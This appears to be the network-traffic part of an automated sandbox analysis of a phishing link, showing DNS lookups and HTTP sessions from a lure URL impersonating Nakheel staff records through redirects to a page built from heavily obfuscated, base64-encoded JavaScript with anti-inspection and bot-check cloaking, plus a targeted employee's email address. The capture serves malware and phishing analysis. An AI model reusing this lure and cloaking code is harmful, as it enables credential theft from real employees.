                                                                                                                          Nov 25, 2024 16:42:59.811475992 CET1.1.1.1192.168.2.40x733aNo error (0)98ox8ctwihwkrs2a8umb2hviudo7s9wgwc5jspvv0du6rxlb4v4gnnr2.bfcgpixdwnw.ru172.67.189.38A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:59.811652899 CET1.1.1.1192.168.2.40x4693No error (0)98ox8ctwihwkrs2a8umb2hviudo7s9wgwc5jspvv0du6rxlb4v4gnnr2.bfcgpixdwnw.ru65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:43:00.075778008 CET1.1.1.1192.168.2.40xb515No error (0)www.azure.comreroute.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:43:00.085833073 CET1.1.1.1192.168.2.40x24e3No error (0)www.azure.comreroute.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          • qqc.ardsmandons.com
                                                                                                                          • fs.microsoft.com
                                                                                                                          • https:
                                                                                                                            • challenges.cloudflare.com
                                                                                                                            • code.jquery.com
                                                                                                                            • cdnjs.cloudflare.com
                                                                                                                            • 98ox8ctwihwkrs2a8umb2hviudo7s9wgwc5jspvv0du6rxlb4v4gnnr2.bfcgpixdwnw.ru
                                                                                                                          • slscr.update.microsoft.com
                                                                                                                          • a.nel.cloudflare.com
                                                                                                                          • otelrules.azureedge.net
                                                                                                                          • nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.com
                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.44973794.46.180.190804944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 25, 2024 16:42:21.399837971 CET527OUTGET /?staffrecords/2024/=c2FiaWthLmFiaWRAbmFraGVlbC5jb20= HTTP/1.1
                                                                                                                          Host: nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Nov 25, 2024 16:42:22.959732056 CET958INHTTP/1.1 301 Moved Permanently
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:20 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          X-Powered-By: PHP/8.0.30
                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          Set-Cookie: PHPSESSID=sm0j1mm0920edocqc991avp25q; path=/
                                                                                                                          Location: https://QQc.ardsmandons.com/4R2xjWr/#Bsabika.abid@nakheel.com
                                                                                                                          X-Scale: YXBvY2FzQGdpdGh1Yg==
                                                                                                                          Data Raw: 31 64 36 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 69 6e 63 6c 75 64 65 28 2e 2f 61 6e 74 69 62 6f 74 73 2e 70 68 70 29 3a 20 46 61 69 6c 65 64 20 74 6f 20 6f 70 65 6e 20 73 74 72 65 61 6d 3a 20 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 69 6e 20 3c 62 3e 2f 68 6f 6d 65 2f 63 6f 70 79 70 72 65 6d 69 75 6d 63 6f 6d 2f 5f 77 69 6c 64 63 61 72 64 5f 2e 63 6f 70 79 70 72 65 6d 69 75 6d 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 69 6e 63 6c 75 64 65 28 29 3a 20 46 61 69 6c 65 64 20 6f 70 65 6e 69 6e 67 20 27 2e 2f 61 6e 74 69 62 6f 74 73 2e 70 68 70 27 20 66 6f 72 20 69 6e 63 6c 75 73 69 6f 6e 20 28 69 6e 63 6c 75 64 65 5f 70 61 74 68 3d 27 2e 3a 2f 6f 70 74 2f 61 6c 74 2f 70 68 70 38 30 2f 75 73 72 2f 73 68 61 72 65 2f 70 65 61 72 3a 2f 6f 70 74 2f 61 6c 74 2f 70 68 70 38 30 2f 75 [TRUNCATED]
                                                                                                                          Data Ascii: 1d6<br /><b>Warning</b>: include(./antibots.php): Failed to open stream: No such file or directory in <b>/home/copypremiumcom/_wildcard_.copypremium.com/index.php</b> on line <b>5</b><br /><br /><b>Warning</b>: include(): Failed opening './antibots.php' for inclusion (include_path='.:/opt/alt/php80/usr/share/pear:/opt/alt/php80/usr/share/php:/usr/share/pear:/usr/share/php') in <b>/home/copypremiumcom/_wildcard_.copypremium.com/index.php</b> on line <b>5</b><br />0
                                                                                                                          Nov 25, 2024 16:43:07.963610888 CET6OUTData Raw: 00
                                                                                                                          Data Ascii:


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.44973894.46.180.190804944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 25, 2024 16:43:06.411722898 CET6OUTData Raw: 00
                                                                                                                          Data Ascii:


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.44974023.52.182.8443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:24 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: identity
                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                          Host: fs.microsoft.com
                                                                                                                          2024-11-25 15:42:25 UTC478INHTTP/1.1 200 OK
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Server: Kestrel
                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                          X-Ms-Region: prod-eus-z1
                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                          X-OSID: 2
                                                                                                                          X-CID: 2
                                                                                                                          X-CCC: GB
                                                                                                                          Cache-Control: public, max-age=64265
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:24 GMT
                                                                                                                          Connection: close
                                                                                                                          X-CID: 2


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.449742172.67.177.194434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:25 UTC670OUTGET /4R2xjWr/ HTTP/1.1
                                                                                                                          Host: qqc.ardsmandons.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:26 UTC1214INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:26 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache, private
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          vary: accept-encoding
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uxK2ZegqhjGHtAjoBviYooLKBPToLydXoiaHLFTyBVR16yxZ2Ggz7iI7xDpR%2BUQlyhgpHAMd9y1HBKm6A8M0jq4dZV%2FTuY3rgdif0jBCxT0DGS1T7NcdNQuzhmk5NQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=35891&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1576&delivery_rate=79373&cwnd=244&unsent_bytes=0&cid=1baa982c596612d4&ts=229&x=0"
                                                                                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6Ijdhd3hUZFNLcmQxYUpHVnlQQjRENkE9PSIsInZhbHVlIjoiaW1BdG5Kd1VoNjRXZTVtRkEvQ3JmZE9TYk5KdlZ1dWErWG4xOVpFc2FJeXhtMk42MXR3STh4TzJzbENBdTZQcWxZaWY1a2wxQ3FEVXN2T1V2WXBmZWR2QXI2a1A1aFpFRFlvS1pocnduL2MrS0w1ME1LSTgya0lNNEtoK3NDcUEiLCJtYWMiOiI2ZDg0NDE2ZjM1OGVlY2JkNDU2N2M4YzIwNTE1MjYwNzg3ZTkxZmZmYWU0ZTQ5MWY4YTMxNjBmODliOGJhYTlhIiwidGFnIjoiIn0%3D; expires=Mon, 25-Nov-2024 17:42:26 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                          2024-11-25 15:42:26 UTC707INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 6c 77 59 31 4a 36 52 6d 78 4b 4d 6d 31 76 64 47 6c 61 51 57 4e 4d 65 46 52 75 57 6b 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 63 48 55 33 63 6a 6c 73 52 7a 4a 59 65 56 6c 48 63 45 35 43 53 47 59 30 51 6a 46 32 55 47 39 30 55 6e 4a 4e 4d 6a 4a 68 5a 57 31 5a 62 6e 56 32 4e 48 46 6e 53 57 35 4c 64 6a 42 6c 61 54 6c 47 64 45 6c 4c 4d 30 52 75 57 46 6f 78 5a 58 4a 45 4e 6e 4d 33 4f 55 6f 7a 4e 31 68 33 62 6b 74 4e 55 54 45 72 4e 6d 78 33 53 53 74 50 61 33 4e 49 4f 45 5a 4d 61 6d 64 6b 62 47 4a 30 4e 6e 4a 31 52 6a 4a 4a 54 33 4a 32 5a 6b 70 47 57 6d 6b 79 54 6b 52 70 62 47 52 68 4b 33 46 61 61 32 68 49 59 57 73 78 4d 58 51 30 59 57 63
                                                                                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InlwY1J6RmxKMm1vdGlaQWNMeFRuWkE9PSIsInZhbHVlIjoicHU3cjlsRzJYeVlHcE5CSGY0QjF2UG90UnJNMjJhZW1ZbnV2NHFnSW5LdjBlaTlGdElLM0RuWFoxZXJENnM3OUozN1h3bktNUTErNmx3SStPa3NIOEZMamdkbGJ0NnJ1RjJJT3J2ZkpGWmkyTkRpbGRhK3Faa2hIYWsxMXQ0YWc
                                                                                                                          2024-11-25 15:42:26 UTC1369INData Raw: 34 62 64 62 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 67 65 74 74 69 6e 67 20 77 68 61 74 20 79 6f 75 20 77 61 6e 74 2c 20 68 61 70 70 69 6e 65 73 73 20 69 73 20 77 61 6e 74 69 6e 67 20 77 68 61 74 20 79 6f 75 20 67 65 74 2e 20 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 52 55 57 4d 75 59 58 4a 6b 63 32 31 68 62 6d 52 76 62 6e 4d 75 59 32 39 74 4c 7a 52 53 4d 6e 68 71 56 33 49 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59
                                                                                                                          Data Ascii: 4bdb... Success is getting what you want, happiness is wanting what you get. --><script>if(atob("aHR0cHM6Ly9RUWMuYXJkc21hbmRvbnMuY29tLzRSMnhqV3Iv") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsY
                                                                                                                          2024-11-25 15:42:26 UTC1369INData Raw: 79 5a 57 30 37 66 51 30 4b 49 33 56 74 63 6c 70 55 52 55 78 47 55 31 41 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 45 78 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 62 57 46 79 5a 32 6c 75 4c 58 4a 70 5a 32 68 30 4f 69 42 68 64 58 52 76 4f 32 31 68 63 6d 64 70 62 69
                                                                                                                          Data Ascii: yZW07fQ0KI3VtclpURUxGU1AuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTExcHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21hcmdpbi
                                                                                                                          2024-11-25 15:42:26 UTC1369INData Raw: 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30
                                                                                                                          Data Ascii: ew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0
                                                                                                                          2024-11-25 15:42:26 UTC1369INData Raw: 32 35 7a 64 43 42 44 52 33 5a 6e 5a 33 64 78 55 32 52 51 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68 44 52 33 5a 6e 5a 33 64 78 55 32 52 51 49 43 30 67 63 33 46 4b 59 30 78 33 5a 56 5a 76 56 43 41 2b 49 46 5a 6e 5a 57 6c 55 5a 32 78 5a 64 56 67 67 4a 69 59 67 49 55 74 56 59 6b 78 4b 59 55 31 56 64 6b 30 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 45 74 56 59 6b 78 4b 59 55 31 56 64 6b 30 67 50 53 42 30 63 6e 56 6c 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 64 32 6c 75 5a 47 39 33 4c 6d 78 76 59 32 46 30 61 57 39 75 4c 6e 4a 6c 63 47 78 68 59 32 55 6f 4a 32 68 30 64 48 42 7a 4f 69 38 76 64 33 64 33 4c 6d 46 36 64 58 4a 6c
                                                                                                                          Data Ascii: 25zdCBDR3ZnZ3dxU2RQID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGlmIChDR3ZnZ3dxU2RQIC0gc3FKY0x3ZVZvVCA+IFZnZWlUZ2xZdVggJiYgIUtVYkxKYU1Vdk0pIHsNCiAgICAgICAgICAgIEtVYkxKYU1Vdk0gPSB0cnVlOw0KICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLnJlcGxhY2UoJ2h0dHBzOi8vd3d3LmF6dXJl
                                                                                                                          2024-11-25 15:42:26 UTC1369INData Raw: 78 68 63 33 4d 39 49 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 69 42 70 5a 44 30 69 62 57 39 6c 53 45 39 43 63 45 64 43 62 69 49 2b 44 51 70 55 61 47 6c 7a 49 48 42 68 5a 32 55 67 61 58 4d 67 64 6d 56 79 61 57 5a 35 61 57 35 6e 49 48 6c 76 64 58 49 67 59 6e 4a 76 64 33 4e 6c 63 69 42 30 62 79 42 6c 62 6e 4e 31 63 6d 55 67 63 32 46 6d 5a 58 52 35 4c 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 63 32 4e 79 61 58 42 30 50 67 30 4b 64 48 56 79 62 6e 4e 30 61 57 78 6c 4c 6e 4a 6c 62 6d 52 6c 63 69 67 6e 49 32 4e 6d 4a 79 77 67 65 77 30 4b 49 43 41 67 49 48 4e 70 64 47 56 72 5a 58 6b 36 49 43 63 77 65 44 52 42 51 55 46 42 51
                                                                                                                          Data Ascii: xhc3M9InRleHQtY2VudGVyIiBpZD0ibW9lSE9CcEdCbiI+DQpUaGlzIHBhZ2UgaXMgdmVyaWZ5aW5nIHlvdXIgYnJvd3NlciB0byBlbnN1cmUgc2FmZXR5Lg0KPC9kaXY+DQo8L2Zvcm0+DQo8L2Rpdj4NCjwvZGl2Pg0KPC9kaXY+DQo8c2NyaXB0Pg0KdHVybnN0aWxlLnJlbmRlcignI2NmJywgew0KICAgIHNpdGVrZXk6ICcweDRBQUFBQ
                                                                                                                          2024-11-25 15:42:26 UTC1369INData Raw: 75 61 6e 4e 76 62 69 67 70 4f 77 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 5a 47 46 30 59 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 47 52 68 64 47 46 62 4a 33 4e 30 59 58 52 31 63 79 64 64 49 44 30 39 49 43 64 7a 64 57 4e 6a 5a 58 4e 7a 4a 79 6c 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 78 76 59 32 46 30 61 57 39 75 4c 6e 4a 6c 62 47 39 68 5a 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 39 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 47 52 68 64 47 46 62 4a 33 4e 30 59 58 52 31 63 79 64 64 49 44 30 39 49 43 64 6c 63 6e 4a 76 63 69 63 70 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 75 63 6d 56 77 62 47 46 6a 5a 53 67 6e 61 48 52 30 63 48
                                                                                                                          Data Ascii: uanNvbigpOw0KICAgIH0pLnRoZW4oZGF0YSA9PiB7DQogICAgICAgIGlmKGRhdGFbJ3N0YXR1cyddID09ICdzdWNjZXNzJyl7DQogICAgICAgIGxvY2F0aW9uLnJlbG9hZCgpOw0KICAgICAgICB9DQogICAgICAgIGlmKGRhdGFbJ3N0YXR1cyddID09ICdlcnJvcicpew0KICAgICAgICB3aW5kb3cubG9jYXRpb24ucmVwbGFjZSgnaHR0cH
                                                                                                                          2024-11-25 15:42:26 UTC1369INData Raw: 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 41 59 59 50 72 6b 4f 42 52 4e 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 41 59 59 50 72 6b 4f 42 52 4e 2e 70 61 74 68 6e 61 6d 65 20 3d 20 41 59 59 50 72 6b 4f 42 52 4e 2e 70 61 74 68 6e 61 6d 65 2e 73 6c 69 63 65 28 30 2c 20 2d 31 29 3b 0d 0a 7d 0d 0a 63 6f 6e 73 74 20 56 63 59 41 58 5a 77 6b 4b 56 20 3d 20 41 59 59 50 72 6b 4f 42 52 4e 2e 70 61 74 68 6e 61 6d 65 2b 27 2f 27 3b 0d 0a 69 66 28 56 63 59 41 58 5a 77 6b 4b 56 20 3d 3d 20 48 6e 69 6b 74 6a 6b 68 75 4b 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55
                                                                                                                          Data Ascii: [0].split('%3F')[0];if (AYYPrkOBRN.pathname.endsWith('/')) {AYYPrkOBRN.pathname = AYYPrkOBRN.pathname.slice(0, -1);}const VcYAXZwkKV = AYYPrkOBRN.pathname+'/';if(VcYAXZwkKV == HniktjkhuK){document.write(decodeURIComponent(escape(atob('PCFET0NU
                                                                                                                          2024-11-25 15:42:26 UTC1369INData Raw: 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 33 56 74 63 6c 70 55 52 55 78 47 55 31 41 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 45 78 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 62 57 46 79 5a 32 6c 75 4c
                                                                                                                          Data Ascii: A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3VtclpURUxGU1AuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTExcHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luL
                                                                                                                          2024-11-25 15:42:26 UTC1369INData Raw: 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69
                                                                                                                          Data Ascii: 0LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJi


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.44974323.52.182.8443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:26 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: identity
                                                                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                          Range: bytes=0-2147483646
                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                          Host: fs.microsoft.com
                                                                                                                          2024-11-25 15:42:27 UTC514INHTTP/1.1 200 OK
                                                                                                                          ApiVersion: Distribute 1.1
                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                          Server: ECAcc (lpl/EF06)
                                                                                                                          X-CID: 11
                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                          X-Ms-Region: prod-neu-z1
                                                                                                                          Cache-Control: public, max-age=64261
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:26 GMT
                                                                                                                          Content-Length: 55
                                                                                                                          Connection: close
                                                                                                                          X-CID: 2
                                                                                                                          2024-11-25 15:42:27 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.449745104.18.95.414434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:28 UTC651OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
